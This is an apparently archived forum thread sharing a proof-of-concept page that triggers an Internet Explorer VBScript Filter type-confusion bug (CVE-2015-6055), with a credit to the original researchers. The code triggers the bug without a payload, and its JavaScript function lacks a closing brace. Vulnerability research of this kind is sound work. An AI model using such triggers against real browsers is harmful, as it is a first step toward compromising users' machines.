View Full Version : Internet Explorer VBScript Filter Type Confusion Vulnerability (CVE-2015-6055)

04-27-2016, 11:33 AM

<meta http-equiv="x-ua-compatible" content="IE=10">
<title>First PoC for MS15-106</title>

<script type="text/vbscript"> Function show_var_type(arg) Dim result '&H2011 = &H2000 (vbArray) | &H11 (vbByte) MsgBox(Hex(VarType(arg))) result = Filter(arg, "w00tw00t", 1, 1) End Function </script>
<script type="text/javascript">
function triggerjs() {
var xmlhttp = new XMLHttpRequest();
xmlhttp.open("GET", "/some_data", false);
xmlhttp.send(); /* XMLHttpRequest.responseBody is a VBArray object containing the raw bytes. */
return xmlhttp.responseBody;
<form> <input type="button" value="PoC" name="conjs" onClick="javascript:show_var_type(triggerjs())" /> </form>


Reference : CoreSecurity (https://blog.coresecurity.com/2016/04/25/exploiting-internet-explorers-ms15-106-part-i-vbscript-filter-type-confusion-vulnerability-cve-2015-6055/)

04-28-2016, 12:49 PM
This is really marvelous piece of work done by researcher. Thanks for sharing it here [s].